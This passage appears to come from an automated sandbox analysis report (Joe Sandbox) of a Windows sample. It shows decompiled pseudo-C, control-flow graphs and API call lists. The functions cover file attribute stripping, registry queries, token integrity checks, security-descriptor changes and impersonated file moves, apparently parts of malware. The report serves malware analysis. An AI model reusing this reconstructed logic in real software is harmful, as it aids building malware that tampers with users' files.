                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                            • Opcode ID: 6f7a1d93e60f227a259aa4b26b3218208e333f2e9c08e18bc984500ce3cd822c
                                                                                                                                                            • Instruction ID: d37ca9eccefb20850e95768bb6628b0de58c19e48c540b7f64029e9a80e5b20f
                                                                                                                                                            • Opcode Fuzzy Hash: 6f7a1d93e60f227a259aa4b26b3218208e333f2e9c08e18bc984500ce3cd822c
                                                                                                                                                            • Instruction Fuzzy Hash: 6C415471A50308BFEB10DFA4CC8AFAE777CBF98B04F114519F611EB191E6B0A9458761
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C2F05, Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 415 9c2f05-9c2f2e call 9c7845 418 9c2f47-9c2f50 415->418 419 9c2f30-9c2f33 415->419 420 9c2f5c-9c2f6e call 9c74f0 418->420 421 9c2f52 418->421 422 9c2f35 419->422 423 9c2f70-9c2f9a call 9c7884 call 9c786b 419->423 434 9c2fee-9c2ff2 420->434 426 9c2f59 421->426 427 9c2f54-9c2f57 421->427 424 9c2f37-9c2f3e 422->424 425 9c2f40-9c2f41 call 9c4b21 422->425 439 9c2f9c-9c2fa3 423->439 440 9c2fa5 423->440 424->423 424->425 433 9c2f46 425->433 426->420 427->420 427->426 433->418 436 9c2fcd-9c2fd5 RtlGetLastWin32Error 434->436 437 9c2ff4-9c3013 434->437 442 9c2fc6-9c2fc8 436->442 443 9c2fd7-9c2feb call 9c568d call 9c74f0 436->443 441 9c3082-9c308f call 9c756b 437->441 439->440 444 9c2fa7-9c2fb0 call 9c4b21 439->444 440->444 449 9c3094-9c3099 441->449 446 9c30a8-9c30ae 442->446 443->434 444->418 457 9c2fb2-9c2fc4 call 9c6962 444->457 452 9c309f-9c30a5 call 9c30af 449->452 453 9c3015-9c3025 RtlGetLastWin32Error 449->453 467 9c30a7 452->467 455 9c305a-9c3064 call 9c7504 453->455 456 9c3027-9c302a 453->456 455->467 460 9c302c-9c3038 call 9c55d8 456->460 461 9c3066-9c3069 456->461 457->418 457->442 460->452 473 9c303a-9c3044 GetFileAttributesW 460->473 469 9c307e-9c3080 461->469 470 9c306b-9c307d call 9c5a21 call 9c568d 461->470 467->446 469->441 470->469 473->455 476 9c3046-9c3048 473->476 476->469 478 9c304a-9c3058 SetFileAttributesW 476->478 478->455 478->469
                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                            			E009C2F05(signed int __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v24;
				char _v64;
				char _v240;
				void* __ebx;
				void* __esi;
				void* _t26;
				void* _t28;
				long _t29;
				void* _t34;
				long _t35;
				void* _t37;
				void* _t38;
				signed char _t42;
				int _t43;
				signed int _t47;
				void* _t50;
				intOrPtr _t53;
				WCHAR* _t54;
				signed int _t57;
				signed int _t67;
				signed int _t69;
				void* _t72;
				void* _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr _t79;

				_t66 = __edx;
				_t69 = 1;
				_t26 = E009C7845(_a8, 0x80000000, 1, 3, 0); // executed
				_t71 = _t26;
				_t74 = _t73 + 0x14;
				if(_t26 == 0) {
					L5:
					_t79 = _a16;
					_t53 = 0x100000;
					if(_t79 <= 0 && (_t79 < 0 || _a12 < 0x100000)) {
						_t53 = _a12;
					}
					_t70 = _a4;
					_t8 = _t53 + 0x160; // 0x100160
					_t28 = E009C74F0(_a4, _t8);
					while(1) {
						_t72 = _t28;
						if(_t72 != 0) {
							break;
						}
						_t29 = RtlGetLastWin32Error();
						__eflags = _t29 - 8;
						if(_t29 != 8) {
							L15:
							return 0;
						}
						E009C568D(_t29, 0x64);
						_t14 = _t53 + 0x160; // 0x100160
						_t28 = E009C74F0(_t70, _t14);
						_t74 = _t74 + 0xc;
					}
					_t57 = 3;
					 *((intOrPtr*)(_t72 + 0x158)) = _t53;
					_t54 = _a8;
					_push(_t57);
					 *((intOrPtr*)(_t72 + 0x154)) = 0;
					 *((intOrPtr*)(_t72 + 0x150)) = 0;
					_v8 = _t57;
					_push(0);
					while(1) {
						_push(0xc0000000);
						_push(_a16);
						_push(_a12);
						_push(_t54);
						_push(_t72); // executed
						_t34 = E009C756B(); // executed
						_t74 = _t74 + 0x1c;
						_t82 = _t34;
						if(_t34 != 0) {
							break;
						}
						_t35 = RtlGetLastWin32Error();
						_t67 = _v8;
						_t58 = _t67;
						_t66 = _t67 - 1;
						_v8 = _t67 - 1;
						__eflags = _t67;
						if(_t67 == 0) {
							L26:
							E009C7504(_t70, _t72);
							_t37 = 0;
							L32:
							return _t37;
						}
						__eflags = _t35 - 5;
						if(_t35 != 5) {
							__eflags = _t35 - 0x20;
							if(__eflags == 0) {
								_t38 = E009C5A21(_t54, _t58, _t66, _t72, __eflags, _t54);
								 *_t74 = 0x3e8;
								E009C568D(_t38);
							}
							L29:
							_push(3);
							_push(0);
							continue;
						}
						__eflags = E009C55D8(_t58, _t54, 0);
						if(__eflags == 0) {
							break;
						}
						_t42 = GetFileAttributesW(_t54);
						__eflags = _t42 - 0xffffffff;
						if(_t42 == 0xffffffff) {
							goto L26;
						}
						__eflags = _t42 & 0x00000001;
						if((_t42 & 0x00000001) == 0) {
							goto L29;
						}
						_t43 = SetFileAttributesW(_t54, 0x80);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L29;
						}
						goto L26;
					}
					E009C30AF(_t66, _t82, _t72);
					_t37 = _t72;
					goto L32;
				}
				_t77 = _a16;
				if(_t77 > 0 || _t77 >= 0 && _a12 >= 0xe8) {
					E009C7884(_t71, 0xffffff18, 0xffffffff, 2);
					_t47 = E009C786B(_t71,  &_v240, 0xe8,  &_v8);
					_t74 = _t74 + 0x20;
					__eflags = _t47;
					if(_t47 == 0) {
						L12:
						_t69 = 0;
						L13:
						E009C4B21(_t71);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L5;
						}
						_t50 = E009C6962(0,  &_v64, 0x20);
						_t74 = _t74 + 0xc;
						__eflags = _v24 - _t50;
						if(_v24 != _t50) {
							goto L5;
						}
						goto L15;
					}
					__eflags = _v8 - 0xe8;
					if(_v8 == 0xe8) {
						goto L13;
					}
					goto L12;
				} else {
					E009C4B21(_t71); // executed
					goto L5;
				}
			}






























                                                                                                                                                            0x009c2f05
                                                                                                                                                            0x009c2f18
                                                                                                                                                            0x009c2f22
                                                                                                                                                            0x009c2f27
                                                                                                                                                            0x009c2f29
                                                                                                                                                            0x009c2f2e
                                                                                                                                                            0x009c2f47
                                                                                                                                                            0x009c2f47
                                                                                                                                                            0x009c2f4b
                                                                                                                                                            0x009c2f50
                                                                                                                                                            0x009c2f59
                                                                                                                                                            0x009c2f59
                                                                                                                                                            0x009c2f5c
                                                                                                                                                            0x009c2f5f
                                                                                                                                                            0x009c2f67
                                                                                                                                                            0x009c2fee
                                                                                                                                                            0x009c2fee
                                                                                                                                                            0x009c2ff2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2fcd
                                                                                                                                                            0x009c2fd2
                                                                                                                                                            0x009c2fd5
                                                                                                                                                            0x009c2fc6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2fc6
                                                                                                                                                            0x009c2fd9
                                                                                                                                                            0x009c2fde
                                                                                                                                                            0x009c2fe6
                                                                                                                                                            0x009c2feb
                                                                                                                                                            0x009c2feb
                                                                                                                                                            0x009c2ff6
                                                                                                                                                            0x009c2ff9
                                                                                                                                                            0x009c2fff
                                                                                                                                                            0x009c3002
                                                                                                                                                            0x009c3003
                                                                                                                                                            0x009c3009
                                                                                                                                                            0x009c300f
                                                                                                                                                            0x009c3012
                                                                                                                                                            0x009c3082
                                                                                                                                                            0x009c3082
                                                                                                                                                            0x009c3087
                                                                                                                                                            0x009c308a
                                                                                                                                                            0x009c308d
                                                                                                                                                            0x009c308e
                                                                                                                                                            0x009c308f
                                                                                                                                                            0x009c3094
                                                                                                                                                            0x009c3097
                                                                                                                                                            0x009c3099
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3015
                                                                                                                                                            0x009c301a
                                                                                                                                                            0x009c301d
                                                                                                                                                            0x009c301f
                                                                                                                                                            0x009c3020
                                                                                                                                                            0x009c3023
                                                                                                                                                            0x009c3025
                                                                                                                                                            0x009c305a
                                                                                                                                                            0x009c305c
                                                                                                                                                            0x009c3062
                                                                                                                                                            0x009c30a7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c30a7
                                                                                                                                                            0x009c3027
                                                                                                                                                            0x009c302a
                                                                                                                                                            0x009c3066
                                                                                                                                                            0x009c3069
                                                                                                                                                            0x009c306c
                                                                                                                                                            0x009c3071
                                                                                                                                                            0x009c3078
                                                                                                                                                            0x009c307d
                                                                                                                                                            0x009c307e
                                                                                                                                                            0x009c307e
                                                                                                                                                            0x009c3080
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3080
                                                                                                                                                            0x009c3036
                                                                                                                                                            0x009c3038
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c303b
                                                                                                                                                            0x009c3041
                                                                                                                                                            0x009c3044
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3046
                                                                                                                                                            0x009c3048
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3050
                                                                                                                                                            0x009c3056
                                                                                                                                                            0x009c3058
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3058
                                                                                                                                                            0x009c30a0
                                                                                                                                                            0x009c30a5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c30a5
                                                                                                                                                            0x009c2f30
                                                                                                                                                            0x009c2f33
                                                                                                                                                            0x009c2f7a
                                                                                                                                                            0x009c2f90
                                                                                                                                                            0x009c2f95
                                                                                                                                                            0x009c2f98
                                                                                                                                                            0x009c2f9a
                                                                                                                                                            0x009c2fa5
                                                                                                                                                            0x009c2fa5
                                                                                                                                                            0x009c2fa7
                                                                                                                                                            0x009c2fa8
                                                                                                                                                            0x009c2fae
                                                                                                                                                            0x009c2fb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2fb9
                                                                                                                                                            0x009c2fbe
                                                                                                                                                            0x009c2fc1
                                                                                                                                                            0x009c2fc4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2fc4
                                                                                                                                                            0x009c2f9c
                                                                                                                                                            0x009c2fa3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2f40
                                                                                                                                                            0x009c2f41
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2f46

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C7845: CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,009C417E,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009C785B
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C2FCD
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3015
                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 009C303B
                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080), ref: 009C3050
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$AttributesErrorLastWin32$Create
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1515811453-0
                                                                                                                                                            • Opcode ID: eb4296efafc4f719087641af36c282752e5351d57d1c4e54d244847c10a3f005
                                                                                                                                                            • Instruction ID: 7b150377f5f0752a9779fb50bdb0ad198bb2593620ddc2509b2a02136c67ead2
                                                                                                                                                            • Opcode Fuzzy Hash: eb4296efafc4f719087641af36c282752e5351d57d1c4e54d244847c10a3f005
                                                                                                                                                            • Instruction Fuzzy Hash: F441F772D05609ABEB35EFA59C86FAF736CAF84310F10852DF914E5182EB709E418673
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C550A, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 479 9c550a-9c5529 RegOpenKeyExW 480 9c552b-9c5543 RegQueryValueExW 479->480 481 9c5580-9c5587 479->481 482 9c5545-9c5547 480->482 483 9c5576-9c557f RegCloseKey 480->483 482->483 484 9c5549-9c5555 call 9c47ab 482->484 483->481 484->483 487 9c5557-9c556b RegQueryValueExW 484->487 487->483 488 9c556d-9c5574 call 9c47f8 487->488 488->483
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C550A(void* _a4, short* _a8, short* _a12, int* _a16, int* _a20) {
				void* _v8;
				long _t13;
				long _t15;
				long _t18;
				int* _t27;
				char* _t30;

				_t30 = 0;
				_t13 = RegOpenKeyExW(_a4, _a8, 0, 1,  &_v8); // executed
				if(_t13 != 0) {
					L7:
					return _t30;
				}
				_t27 = _a20;
				_t15 = RegQueryValueExW(_v8, _a12, 0, _a16, 0, _t27); // executed
				if(_t15 == 0 &&  *_t27 != 0) {
					_t30 = E009C47AB( *_t27);
					if(_t30 != 0) {
						_t18 = RegQueryValueExW(_v8, _a12, 0, _a16, _t30, _t27); // executed
						if(_t18 != 0) {
							E009C47F8(_t30);
							_t30 = 0;
						}
					}
				}
				RegCloseKey(_v8); // executed
				goto L7;
			}









                                                                                                                                                            0x009c551c
                                                                                                                                                            0x009c5521
                                                                                                                                                            0x009c5529
                                                                                                                                                            0x009c5580
                                                                                                                                                            0x009c5587
                                                                                                                                                            0x009c5587
                                                                                                                                                            0x009c552c
                                                                                                                                                            0x009c553b
                                                                                                                                                            0x009c5543
                                                                                                                                                            0x009c5550
                                                                                                                                                            0x009c5555
                                                                                                                                                            0x009c5563
                                                                                                                                                            0x009c556b
                                                                                                                                                            0x009c556e
                                                                                                                                                            0x009c5574
                                                                                                                                                            0x009c5574
                                                                                                                                                            0x009c556b
                                                                                                                                                            0x009c5555
                                                                                                                                                            0x009c5579
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • RegOpenKeyExW.KERNEL32(0000000C,0000000F,00000000,00000001,?,009D0270,00000000,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C5521
                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,80000002,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C553B
                                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C,0000000F,0000000C,?), ref: 009C5579
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C), ref: 009C5563
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HeapQueryValue$CloseCreateOpenProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3348224683-0
                                                                                                                                                            • Opcode ID: 67fdf59d1a83fca5639c905c903dc2b77f781e5ace48cf5080af5a3d7d498651
                                                                                                                                                            • Instruction ID: d584289ae5b0ec48dcc248680f0974319f00e2b349930f2f694d756e78ce1358
                                                                                                                                                            • Opcode Fuzzy Hash: 67fdf59d1a83fca5639c905c903dc2b77f781e5ace48cf5080af5a3d7d498651
                                                                                                                                                            • Instruction Fuzzy Hash: 97018032A11119BFAF214FA1DC44EABBB6EEF457D4B010169F90091130D7329E60ABA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C56DA, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 491 9c56da-9c56ea 492 9c56ec-9c5701 GetCurrentProcess OpenProcessToken 491->492 493 9c572e-9c5746 SetNamedSecurityInfoW 491->493 494 9c5748-9c574a 492->494 495 9c5703-9c571d GetTokenInformation 492->495 493->494 496 9c574c 493->496 497 9c574e-9c5752 494->497 495->494 498 9c571f-9c5728 call 9c4b21 495->498 496->497 500 9c572d 498->500 500->493
                                                                                                                                                            C-Code - Quality: 36%
                                                                                                                                                            			E009C56DA(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t8;
				int _t12;

				_push(_t14);
				if( *0x9d1d4c != 0) {
					L4:
					 *0x9d10b4(_a4, 1, 1,  *0x9d1d50, 0, 0, 0); // executed
					if(0 == 0) {
						_t8 = 1;
					} else {
						goto L5;
					}
				} else {
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
						L5:
						_t8 = 0;
					} else {
						_t12 = GetTokenInformation(_v8, 1, 0x9d1d50, 0x200,  &_v12); // executed
						if(_t12 == 0) {
							goto L5;
						} else {
							 *0x9d1d4c = 1; // executed
							E009C4B21(_v8); // executed
							goto L4;
						}
					}
				}
				return _t8;
			}







                                                                                                                                                            0x009c56de
                                                                                                                                                            0x009c56ea
                                                                                                                                                            0x009c572e
                                                                                                                                                            0x009c573e
                                                                                                                                                            0x009c5746
                                                                                                                                                            0x009c574c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c56ec
                                                                                                                                                            0x009c5701
                                                                                                                                                            0x009c5748
                                                                                                                                                            0x009c5748
                                                                                                                                                            0x009c5703
                                                                                                                                                            0x009c5715
                                                                                                                                                            0x009c571d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c571f
                                                                                                                                                            0x009c5722
                                                                                                                                                            0x009c5728
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c572d
                                                                                                                                                            0x009c571d
                                                                                                                                                            0x009c5701
                                                                                                                                                            0x009c5752

                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,?,?,009C560D,?,?,?,009C2D35,?,00000001), ref: 009C56EC
                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,009C560D,?,?,?,009C2D35,?,00000001), ref: 009C56F9
                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),009D1D50,00000200,?,?,?,?,009C560D,?,?,?,009C2D35,?,00000001), ref: 009C5715
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000001,00000000,00000000,00000000,00000000,?,?,?,009C560D,?,?,?,009C2D35,?), ref: 009C573E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProcessToken$ChangeCloseCurrentFindInfoInformationNamedNotificationOpenSecurity
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 160603818-0
                                                                                                                                                            • Opcode ID: 0048ea6286ab907acb46e3e524ec46aade8e1e3b078d180d3be2d468278fbc67
                                                                                                                                                            • Instruction ID: f268b04480e7bdb7eaf475108908baa8d59f2f30ee975da603e0571c7b749c60
                                                                                                                                                            • Opcode Fuzzy Hash: 0048ea6286ab907acb46e3e524ec46aade8e1e3b078d180d3be2d468278fbc67
                                                                                                                                                            • Instruction Fuzzy Hash: 40016276A59118FFEB205BA1EC09FBF7BADEB05751F00001AB905D10A0D760ADC0EBB2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7939, Relevance: 6.0, APIs: 4, Instructions: 24fileCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 501 9c7939-9c794d MoveFileW 502 9c794f-9c7957 RtlGetLastWin32Error 501->502 503 9c7975 501->503 502->503 504 9c7959-9c7960 call 9c509b 502->504 505 9c7977-9c7979 503->505 504->505 508 9c7962-9c7970 MoveFileW RevertToSelf 504->508 508->503
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7939(WCHAR* _a4, WCHAR* _a8) {
				int _t5;
				void* _t8;
				void* _t11;
				int _t12;

				_t5 = MoveFileW(_a4, _a8); // executed
				_t12 = _t5;
				if(_t12 != 0 || RtlGetLastWin32Error() != 3) {
					L4:
					return _t12;
				}
				_t8 = E009C509B(_t11);
				if(_t8 != 0) {
					_t12 = MoveFileW(_a4, _a8);
					RevertToSelf();
					goto L4;
				}
				return _t8;
			}







                                                                                                                                                            0x009c7943
                                                                                                                                                            0x009c7949
                                                                                                                                                            0x009c794d
                                                                                                                                                            0x009c7975
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7975
                                                                                                                                                            0x009c7959
                                                                                                                                                            0x009c7960
                                                                                                                                                            0x009c796e
                                                                                                                                                            0x009c7970
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7970
                                                                                                                                                            0x009c7979

                                                                                                                                                            APIs
                                                                                                                                                            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009C7943
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C794F
                                                                                                                                                              • Part of subcall function 009C509B: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,009C7BCB), ref: 009C50DC
                                                                                                                                                            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009C7968
                                                                                                                                                            • RevertToSelf.ADVAPI32(?,009C31DE,50C2440F,00000000,00000000,?,?,00000000,009C364E,?,?), ref: 009C7970
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileMove$ErrorLastOpenProcessRevertSelfWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3666651738-0
                                                                                                                                                            • Opcode ID: e54b2e28efc97fbd385420ebb6aa7156231df30a56e15eebf13535da0146b4f2
                                                                                                                                                            • Instruction ID: b8b304564528a359445dfaa95c0245f9be69c09948f20494354bfe09e18ef0d8
                                                                                                                                                            • Opcode Fuzzy Hash: e54b2e28efc97fbd385420ebb6aa7156231df30a56e15eebf13535da0146b4f2
                                                                                                                                                            • Instruction Fuzzy Hash: AEE04F36E48519778F213BF0DC04F59BB589F423B0B014029FE18C6221CA31DDD0ABD2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C3571, Relevance: 4.6, APIs: 3, Instructions: 124threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                            			E009C3571(intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _t32;
				long _t34;
				void* _t41;
				void* _t43;
				void* _t48;
				char _t53;
				signed int _t56;
				char _t61;
				signed int _t64;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t70;
				intOrPtr _t76;
				intOrPtr _t82;

				SetThreadPriority(GetCurrentThread(), 2); // executed
				_t68 = _a4;
				_t32 = E009C7518(_a4,  &_v12,  &_v16,  &_v8, 0xffffffff);
				_t70 = _t69 + 0x14;
				if( *0x9d1d04 == 0) {
					do {
						if(_t32 == 0) {
							_t34 = RtlGetLastWin32Error();
							__eflags = _t34 - 0x26;
							if(_t34 == 0x26) {
								E009C2EB9(_t68, _v8);
								goto L22;
							}
						} else {
							_push(0);
							E009C75E6(_v8, _v12);
							_t61 = _v8;
							_t70 = _t70 + 0xc;
							if( *0x9d2278 == 2 &&  *((intOrPtr*)(_t61 + 0x150)) == 2) {
								 *((intOrPtr*)(_t61 + 0x20)) =  *((intOrPtr*)(_t61 + 0x20)) - _v12;
								asm("sbb [ecx+0x24], ebx");
								_t53 = _v8;
								_t64 =  *0x9d227c; // 0x0
								_t65 = _t64 << 0x14;
								_t76 =  *((intOrPtr*)(_t53 + 0x24));
								if(_t76 < 0 || _t76 <= 0 &&  *((intOrPtr*)(_t53 + 0x20)) <= _t65) {
									_push( *((intOrPtr*)(_t53 + 0x24)));
									E009C75E6(_t53,  *((intOrPtr*)(_t53 + 0x20)));
									_t70 = _t70 + 0xc;
								} else {
									_push(0);
									E009C75E6(_t53, _t65);
									_t66 = _v8;
									_t70 = _t70 + 0xc;
									_t56 =  *0x9d227c; // 0x0
									 *((intOrPtr*)(_t66 + 0x20)) =  *((intOrPtr*)(_v8 + 0x20)) - (_t56 << 0x14);
									asm("sbb [ecx+0x24], ebx");
								}
								_t61 = _v8;
							}
							_t41 =  *((intOrPtr*)(_t61 + 0x154)) - 1;
							if(_t41 == 0) {
